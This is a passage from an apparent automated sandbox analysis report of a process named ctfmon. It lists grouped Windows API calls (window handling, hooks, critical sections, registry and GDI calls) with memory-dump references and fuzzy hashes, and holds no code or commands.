        • GetWindow.USER32(?,00000005), ref: 0041CDE3
        • GetWindow.USER32(00000000,00000005), ref: 0041CDFF
        • GetWindow.USER32(00000000,00000002), ref: 0041CE15
        • GetWindow.USER32(00000000,00000002), ref: 0041CE20
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window
        • String ID:
        • API String ID: 2353593579-0
        • Opcode ID: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
        • Instruction ID: f7176755ff76171dbc3ca36412ed8f896c65f43d2b9e194da37f980429bdcab7
        • Opcode Fuzzy Hash: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
        • Instruction Fuzzy Hash: 59F0A47738070122D222756A7CC6FAB7B988BD2B51F50043AF600A6282EE59E855426D
        APIs
        • CallNextHookEx.USER32(00000000,?,?,?), ref: 0041C39B
        • UnhookWindowsHookEx.USER32(00000000), ref: 0041C3B4
        • GetWindowLongA.USER32(?,000000F0), ref: 0041C3CB
        • SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 0041C3F5
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
        • String ID:
        • API String ID: 4187046592-0
        • Opcode ID: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
        • Instruction ID: e56733217a63c98b9cfcbaa9d3ee52952c096190bbd855f3486cba2e69e87e11
        • Opcode Fuzzy Hash: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
        • Instruction Fuzzy Hash: B91133B5600200AFD314DF54ECA4E6B77E5AB98314F40843DF545C33A0D774E848CB55
        APIs
        • GetWindow.USER32(?,00000005), ref: 0041CEE5
        • GetWindowLongA.USER32(?,000000F0), ref: 0041CEF2
        • SetTextColor.GDI32(?,?), ref: 0041CF0F
        • SetBkColor.GDI32(?,?), ref: 0041CF1D
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ColorWindow$LongText
        • String ID:
        • API String ID: 3945788684-0
        • Opcode ID: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
        • Instruction ID: 333cb50309b1e51d381b8678f90b3801f6ee55970ce0cf9ad49621ef8d753c56
        • Opcode Fuzzy Hash: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
        • Instruction Fuzzy Hash: FD01DD36249210ABD730D764BCC8DEF7795EB62721F14052BEA41D31D4C724A9C7C65D
        APIs
        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004254EE
        • GetCurrentProcess.KERNEL32(?,00000000), ref: 004254F4
        • DuplicateHandle.KERNEL32(00000000), ref: 004254F7
        • GetLastError.KERNEL32(00000000), ref: 00425511
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentProcess$DuplicateErrorHandleLast
        • String ID:
        • API String ID: 3907606552-0
        • Opcode ID: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
        • Instruction ID: ba12cf247d713ca83e744a91bb1c1a492d77c11568612e8c832d1772640133eb
        • Opcode Fuzzy Hash: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
        • Instruction Fuzzy Hash: 5901FC31700210BBEB10ABA5EC8AF1ABB9DDF44711F544426F519C7281EAB4DC408B64
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041C866
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041C873
        • UnhookWindowsHookEx.USER32(?), ref: 0041C8B6
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041C8FB
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
        • String ID:
        • API String ID: 1197249173-0
        • Opcode ID: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
        • Instruction ID: fe24c6a5f78cf2ac84ca5597e3b7d88d370af96ecf399c2d86962ad3691242d6
        • Opcode Fuzzy Hash: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
        • Instruction Fuzzy Hash: 20119135690208EFC730EF65ECC46EA73A5FB1130AF60143AE60683591E735B89ADB94
        APIs
        • GetTopWindow.USER32(?), ref: 0042318D
        • SendMessageW.USER32(00000000,?,?,?), ref: 004231C3
        • GetTopWindow.USER32(00000000), ref: 004231D0
        • GetWindow.USER32(00000000,00000002), ref: 004231EE
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$MessageSend
        • String ID:
        • API String ID: 1496643700-0
        • Opcode ID: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
        • Instruction ID: d55262b01c94f31a90e2b1312f8a616a94e02ae52ed97f2f18e0d229c57d5f04
        • Opcode Fuzzy Hash: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
        • Instruction Fuzzy Hash: 8301E936201229BBCF126F91AC05EEF3B7AAF05351F844516FA0451124C73ECA72EBA9
        APIs
        • GetDlgItem.USER32(?,?), ref: 00423111
        • GetTopWindow.USER32(00000000), ref: 00423124
        • GetTopWindow.USER32(?), ref: 00423154
        • GetWindow.USER32(00000000,00000002), ref: 0042316F
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Item
        • String ID:
        • API String ID: 369458955-0
        • Opcode ID: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
        • Instruction ID: 345862615f9688ebf3cdbf4b66b4982080435a2b4c306f56a0d53421e26843f6
        • Opcode Fuzzy Hash: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
        • Instruction Fuzzy Hash: CB018435301139778F222F62AC00EBF7A79AF14392F854126FD0095214D73DCA3296DD
        APIs
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Item$EnableFocusMenuNextParent
        • String ID:
        • API String ID: 988757621-0
        • Opcode ID: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
        • Instruction ID: 8a4b78d4f47e5053a81751d92e7ee6ced98987c858b46bcdd7bf6efd082f8e31
        • Opcode Fuzzy Hash: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
        • Instruction Fuzzy Hash: 16113C713006109BDB38AF21E859B2BB7F5AF90314FA0462EE546875A1CB78E891CB59
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041CAA6
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041CAB3
        • UnhookWindowsHookEx.USER32(?), ref: 0041CAEA
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041CB29
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
        • String ID:
        • API String ID: 1197249173-0
        • Opcode ID: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
        • Instruction ID: 73ecd1883983c7791e4a145524bf18d34c630e1f3d92ae3c2823ecf711c72ab0
        • Opcode Fuzzy Hash: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
        • Instruction Fuzzy Hash: 3B01C075290608AFC730DF65FCC95EA33A4FB01349B20147AE606C3591E735B8AACF90
        APIs
        • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042735C
        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427365
        • wsprintfW.USER32 ref: 00427381
        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0042739A
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClosePrivateProfileStringValueWritewsprintf
        • String ID:
        • API String ID: 1902064621-0
        • Opcode ID: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
        • Instruction ID: 6d4ab68f11891ff308c174a238285f84ccdd3e51e257b8ace891e9d2ef57e05c
        • Opcode Fuzzy Hash: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
        • Instruction Fuzzy Hash: EA016272600224BBCF219FA4EC09FDE37A9AF08714F844026FE15E6190E7B4D511DB9C
        APIs
        • GetObjectW.GDI32(00000000,0000000C,?), ref: 004237F1
        • SetBkColor.GDI32(00000000,00000000), ref: 004237FD
        • GetSysColor.USER32(00000008), ref: 0042380D
        • SetTextColor.GDI32(00000000,?), ref: 00423817
          • Part of subcall function 00426950: GetWindowLongW.USER32(00000000,000000F0), ref: 00426961
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Color$LongObjectTextWindow
        • String ID:
        • API String ID: 2871169696-0
        • Opcode ID: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
        • Instruction ID: 996a509eb5483e03d1280d7cc741f4f8e1f151524dd7178acde86eebcbf6a08c
        • Opcode Fuzzy Hash: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
        • Instruction Fuzzy Hash: 13011E30600155AEDF21AF54EC45AAE3BF5AB00342F944522FA02C91A0CB78CE91D69A
        APIs
        • GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
        • GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
        • MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
        • MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ViewportWindow
        • String ID:
        • API String ID: 1589084482-0
        • Opcode ID: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
        • Instruction ID: 5e34c4cd6609403dc149269c458482475ccf921670738db4690db06b0d034127
        • Opcode Fuzzy Hash: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
        • Instruction Fuzzy Hash: D3F01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94
        APIs
        • lstrlenW.KERNEL32(?), ref: 00426A47
        • GetWindowTextW.USER32(?,?,00000100), ref: 00426A63
        • lstrcmpW.KERNEL32(?,?), ref: 00426A77
        • SetWindowTextW.USER32(?,?), ref: 00426A87
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: TextWindow$lstrcmplstrlen
        • String ID:
        • API String ID: 330964273-0
        • Opcode ID: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
        • Instruction ID: c0d20ed1f89d7020bcb479a82dbdd8d31feb51cd73047c170cfc194cd6cd2529
        • Opcode Fuzzy Hash: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
        • Instruction Fuzzy Hash: D4F01235A00129BBDF216F64EC88ADE7B69FB05390F448161F819E1160EB35DD568B98
        APIs
        • GetTickCount.KERNEL32 ref: 00429554
        • GetTickCount.KERNEL32 ref: 00429561
        • CoFreeUnusedLibraries.OLE32 ref: 00429570
        • GetTickCount.KERNEL32 ref: 00429576
          • Part of subcall function 004294D7: CoFreeUnusedLibraries.OLE32 ref: 0042951F
          • Part of subcall function 004294D7: OleUninitialize.OLE32 ref: 00429525
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CountTick$FreeLibrariesUnused$Uninitialize
        • String ID:
        • API String ID: 685759847-0
        • Opcode ID: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
        • Instruction ID: 909b3d72e97e5b8f4fa77f634aeb50083d73612e72484a6c6d3d5ea4d5bcd909
        • Opcode Fuzzy Hash: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
        • Instruction Fuzzy Hash: 60E01271E05125FBC711AF60FD8865E37A0EB14311F905877D04192264C7785C85DF9D
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClearH_prologVariant
        • String ID: @
        • API String ID: 1166855276-2766056989
        • Opcode ID: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
        • Instruction ID: b858331317e13cfe4e871a22f7291cb985bca7952d51c674c1c62d25b1df6737
        • Opcode Fuzzy Hash: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
        • Instruction Fuzzy Hash: 3C51A370E002199FDB14CFA9C888AEEB7F9FF48304F20856AE516E7251E774A906CF50
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Info
        • String ID: $
        • API String ID: 1807457897-3032137957
        • Opcode ID: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
        • Instruction ID: 80a56d3aed95c468bd87d356a319ccf427369d6e1cb2682b21b51dc1b754c7b8
        • Opcode Fuzzy Hash: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
        • Instruction Fuzzy Hash: 5741DF3280425C2EDB118714CDA9FFB7FA99B12740F1804FED585C7252CB294989D7AA
        APIs
        • IsChild.USER32(?,?), ref: 0040C704
        • GetWindowLongW.USER32(?,000000EC), ref: 0040C71B
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ChildLongWindow
        • String ID: 0
        • API String ID: 1178903432-4108050209
        • Opcode ID: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
        • Instruction ID: 80f36ecc902128788ccff313db005aea39b01ff33b9cc0f7ff94248ddef8e30b
        • Opcode Fuzzy Hash: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
        • Instruction Fuzzy Hash: 1F218B22101206E6DB31AB358CC5B6B66589F507A5F241B3FBC06B32C2DB3DCD4199AC
        APIs
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
        • GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharMultiStringTypeWide
        • String ID: @
        • API String ID: 3139900361-216407459
        • Opcode ID: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
        • Instruction ID: c75d9d2e149fe478884894de742f27978b31c81d622bbf0292b479ae06dd18f0
        • Opcode Fuzzy Hash: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
        • Instruction Fuzzy Hash: 20217F31D0070AEBCF218F98EC459DEBBB5FF88314F20851AE55077290D3759A95DB54
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
